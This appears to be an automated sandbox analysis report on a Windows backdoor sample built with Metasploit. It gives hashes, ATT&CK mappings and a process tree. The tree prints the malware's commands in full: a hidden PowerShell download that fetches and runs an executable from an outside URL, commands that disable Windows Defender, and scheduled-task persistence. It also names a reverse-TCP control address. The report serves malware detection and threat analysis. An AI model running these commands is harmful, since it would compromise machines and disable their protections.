metasploit | db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-12-2024 18:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WO.exe
Size

126KB
MD5

7176b040816932541eb9c2b91d90b29b
SHA1

137a9c4620366caff2a1d1c297b6ae8c6d28761d
SHA256

db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
SHA512

1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
SSDEEP

3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn

Score

10^/10

metasploit backdoor discovery evasion execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe

Extracted

Family

metasploit

Version

windows/reverse_tcp

147.185.221.23:1121

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	4384	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3308	powershell.exe
2264	powershell.exe
4856	powershell.exe
4384	powershell.exe
1996	powershell.exe
740	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WO.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WO.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WO.exe

Executes dropped EXE 5 IoCs

pid	Process
2028	reddit.exe
5032	WO.exe
3716	reddit.exe
2212	WO.exe
2576	reddit.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4400	sc.exe
1864	sc.exe
5104	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reddit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3184	schtasks.exe
3836	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3308	powershell.exe
3308	powershell.exe
4384	powershell.exe
4384	powershell.exe
2264	powershell.exe
2264	powershell.exe
1996	powershell.exe
1996	powershell.exe
4856	powershell.exe
4856	powershell.exe
740	powershell.exe
740	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	740	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4932 wrote to memory of 3120	4932	WO.exe	83
PID 4932 wrote to memory of 3120	4932	WO.exe	83
PID 3120 wrote to memory of 3308	3120	cmd.exe	85
PID 3120 wrote to memory of 3308	3120	cmd.exe	85
PID 3120 wrote to memory of 4384	3120	cmd.exe	86
PID 3120 wrote to memory of 4384	3120	cmd.exe	86
PID 3120 wrote to memory of 2028	3120	cmd.exe	87
PID 3120 wrote to memory of 2028	3120	cmd.exe	87
PID 3120 wrote to memory of 2028	3120	cmd.exe	87
PID 3120 wrote to memory of 2376	3120	cmd.exe	88
PID 3120 wrote to memory of 2376	3120	cmd.exe	88
PID 3120 wrote to memory of 3644	3120	cmd.exe	89
PID 3120 wrote to memory of 3644	3120	cmd.exe	89
PID 3120 wrote to memory of 3836	3120	cmd.exe	90
PID 3120 wrote to memory of 3836	3120	cmd.exe	90
PID 3120 wrote to memory of 3716	3120	cmd.exe	91
PID 3120 wrote to memory of 3716	3120	cmd.exe	91
PID 3120 wrote to memory of 3184	3120	cmd.exe	92
PID 3120 wrote to memory of 3184	3120	cmd.exe	92
PID 3120 wrote to memory of 4400	3120	cmd.exe	93
PID 3120 wrote to memory of 4400	3120	cmd.exe	93
PID 3120 wrote to memory of 4060	3120	cmd.exe	94
PID 3120 wrote to memory of 4060	3120	cmd.exe	94
PID 4060 wrote to memory of 3672	4060	net.exe	95
PID 4060 wrote to memory of 3672	4060	net.exe	95
PID 3120 wrote to memory of 3076	3120	cmd.exe	96
PID 3120 wrote to memory of 3076	3120	cmd.exe	96
PID 3120 wrote to memory of 4868	3120	cmd.exe	97
PID 3120 wrote to memory of 4868	3120	cmd.exe	97
PID 5032 wrote to memory of 3308	5032	WO.exe	115
PID 5032 wrote to memory of 3308	5032	WO.exe	115
PID 3308 wrote to memory of 2264	3308	cmd.exe	117
PID 3308 wrote to memory of 2264	3308	cmd.exe	117
PID 3308 wrote to memory of 1996	3308	cmd.exe	118
PID 3308 wrote to memory of 1996	3308	cmd.exe	118
PID 3308 wrote to memory of 3716	3308	cmd.exe	119
PID 3308 wrote to memory of 3716	3308	cmd.exe	119
PID 3308 wrote to memory of 3716	3308	cmd.exe	119
PID 3308 wrote to memory of 3184	3308	cmd.exe	120
PID 3308 wrote to memory of 3184	3308	cmd.exe	120
PID 3308 wrote to memory of 5000	3308	cmd.exe	121
PID 3308 wrote to memory of 5000	3308	cmd.exe	121
PID 3308 wrote to memory of 1276	3308	cmd.exe	122
PID 3308 wrote to memory of 1276	3308	cmd.exe	122
PID 3308 wrote to memory of 1864	3308	cmd.exe	123
PID 3308 wrote to memory of 1864	3308	cmd.exe	123
PID 3308 wrote to memory of 3672	3308	cmd.exe	124
PID 3308 wrote to memory of 3672	3308	cmd.exe	124
PID 3672 wrote to memory of 4872	3672	net.exe	125
PID 3672 wrote to memory of 4872	3672	net.exe	125
PID 3308 wrote to memory of 3692	3308	cmd.exe	126
PID 3308 wrote to memory of 3692	3308	cmd.exe	126
PID 3308 wrote to memory of 1616	3308	cmd.exe	127
PID 3308 wrote to memory of 1616	3308	cmd.exe	127
PID 2212 wrote to memory of 3976	2212	WO.exe	130
PID 2212 wrote to memory of 3976	2212	WO.exe	130
PID 3976 wrote to memory of 4856	3976	cmd.exe	132
PID 3976 wrote to memory of 4856	3976	cmd.exe	132
PID 3976 wrote to memory of 740	3976	cmd.exe	133
PID 3976 wrote to memory of 740	3976	cmd.exe	133
PID 3976 wrote to memory of 2576	3976	cmd.exe	134
PID 3976 wrote to memory of 2576	3976	cmd.exe	134
PID 3976 wrote to memory of 2576	3976	cmd.exe	134
PID 3976 wrote to memory of 1536	3976	cmd.exe	135

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2376	attrib.exe
3184	attrib.exe
1536	attrib.exe

C:\Users\Admin\AppData\Local\Temp\WO.exe
"C:\Users\Admin\AppData\Local\Temp\WO.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4932
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\73B9.tmp\73BA.tmp\73BB.bat C:\Users\Admin\AppData\Local\Temp\WO.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4384
- - C:\Users\Admin\AppData\Local\Temp\reddit.exe
    "C:\Users\Admin\AppData\Local\Temp\reddit.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2028
- - C:\Windows\system32\attrib.exe
    attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
    3⤵
    - Views/modifies file attributes
    PID:2376
- - C:\Windows\system32\schtasks.exe
    schtasks /query /TN "RunRedditLogon"
    3⤵
    PID:3644
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3836
- - C:\Windows\system32\schtasks.exe
    schtasks /query /TN "RunRedditMinute"
    3⤵
    PID:3716
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3184
- - C:\Windows\system32\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:4400
- - C:\Windows\system32\net.exe
    net stop WinDefend
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:3672
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:3076
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4868

C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5032
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E86.tmp\5E87.tmp\5E88.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- - C:\Users\Admin\AppData\Local\Temp\reddit.exe
    "C:\Users\Admin\AppData\Local\Temp\reddit.exe"
    3⤵
    - Executes dropped EXE
    PID:3716
- - C:\Windows\system32\attrib.exe
    attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
    3⤵
    - Views/modifies file attributes
    PID:3184
- - C:\Windows\system32\schtasks.exe
    schtasks /query /TN "RunRedditLogon"
    3⤵
    PID:5000
- - C:\Windows\system32\schtasks.exe
    schtasks /query /TN "RunRedditMinute"
    3⤵
    PID:1276
- - C:\Windows\system32\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:1864
- - C:\Windows\system32\net.exe
    net stop WinDefend
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:4872
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:3692
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1616

C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2212
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\44EF.tmp\44F0.tmp\44F1.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:740
- - C:\Users\Admin\AppData\Local\Temp\reddit.exe
    "C:\Users\Admin\AppData\Local\Temp\reddit.exe"
    3⤵
    - Executes dropped EXE
    PID:2576
- - C:\Windows\system32\attrib.exe
    attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
    3⤵
    - Views/modifies file attributes
    PID:1536
- - C:\Windows\system32\schtasks.exe
    schtasks /query /TN "RunRedditLogon"
    3⤵
    PID:4260
- - C:\Windows\system32\schtasks.exe
    schtasks /query /TN "RunRedditMinute"
    3⤵
    PID:4268
- - C:\Windows\system32\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:5104
- - C:\Windows\system32\net.exe
    net stop WinDefend
    3⤵
    PID:4252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:920
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:212
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c9651b181715c50f05d8235bf1440da7

SHA1
5a886ede4a3dfc5c825785ac0afbd0319fd95db5

SHA256
4c02d051f29c48dd9e6a9a3445b845b055b3815ea493823b2950ab46b5e6982b

SHA512
597bec665ef9d3e62bb2cec9be0a1093df403fec1feb5290de40e88c83f9b59c31dbb7277922a68a743ddb39af2a202b72438116b866af40db42ade28d3daf70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f427c5cd94e76ea1dca22df019171e21

SHA1
e68ffa1fb0063a00ea7a087c949c1282ced1d496

SHA256
29b3991838f0692860776730238e074e2b3f5214dc15076f5e7e8199c8aa83d2

SHA512
bb78a5554bbc7cbedea1aceabdf19432500e83762a77837f0f7e94ca29bc1fbe8a5a863d265b8084c334b24b71b536ec402cb2833291078ce7b6342e9d1fb504

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b21caedd3e5c9fe7bdd95632c9e94049

SHA1
8a34331a46b7b209fca8e4a1ce3d6e8b5daab45d

SHA256
f52882f1689b9690e14015f4e567f87835531e357c7dc615644b3847db2a4d2a

SHA512
a971df7ce045e47fe6f5943959215c428678a4c31a507ab28b5087f6634d18a61416fa4a36f65430acbc4955ca16381990f0b2cce0e0c218c18b53bde797f9b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a66904fe28a9c28446e44f44e5ba034b

SHA1
d4277226b3b95b2f92dc745bda7096a98d4a9f26

SHA256
eb82b392f4cc90f4bb62e8d5d779a23ee0aa67832dcc8af94ce6099dd6cef8a7

SHA512
a873699317c8905a3171985b04f9aa15993224bf18dad3233254229e04deec7232eb9effa1f6f17a9ad525d33a65cc7bb0000d899c2ebcc8ab312be6d01081a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\73B9.tmp\73BA.tmp\73BB.bat

Filesize
2KB

MD5
c0e9bc2dfff6e08df8196809b9bbf253

SHA1
006e88ea359145c40a6bbca55e6f21b387999255

SHA256
43c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11

SHA512
5b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rsw035bo.lzp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\reddit.exe

Filesize
72KB

MD5
23544090c6d379e3eca7343c4f05d4d2

SHA1
c9250e363790a573e9921a68b7abe64f27e63df1

SHA256
b439d22ed2c1e1f83f3c52d1a7307d9aee8b516166ab221cb6d67b188cd80f56

SHA512
6aca78b0653e87ac80d7f562e6ab6d650f4d53d375cad043eb9613c7bbd642f7f82564a872b1b05520a77acbeba9da0540c4cd5a855a28a8188ebe3a4b57775c

Download Submit
C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe

Filesize
126KB

MD5
7176b040816932541eb9c2b91d90b29b

SHA1
137a9c4620366caff2a1d1c297b6ae8c6d28761d

SHA256
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

SHA512
1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

Download Submit
memory/3308-17-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

Filesize
10.8MB

Download
memory/3308-14-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

Filesize
10.8MB

Download
memory/3308-13-0x00007FFA20940000-0x00007FFA21401000-memory.dmp

Filesize
10.8MB

Download
memory/3308-3-0x0000021C70370000-0x0000021C70392000-memory.dmp

Filesize
136KB

Download
memory/3308-2-0x00007FFA20943000-0x00007FFA20945000-memory.dmp

Filesize
8KB

Download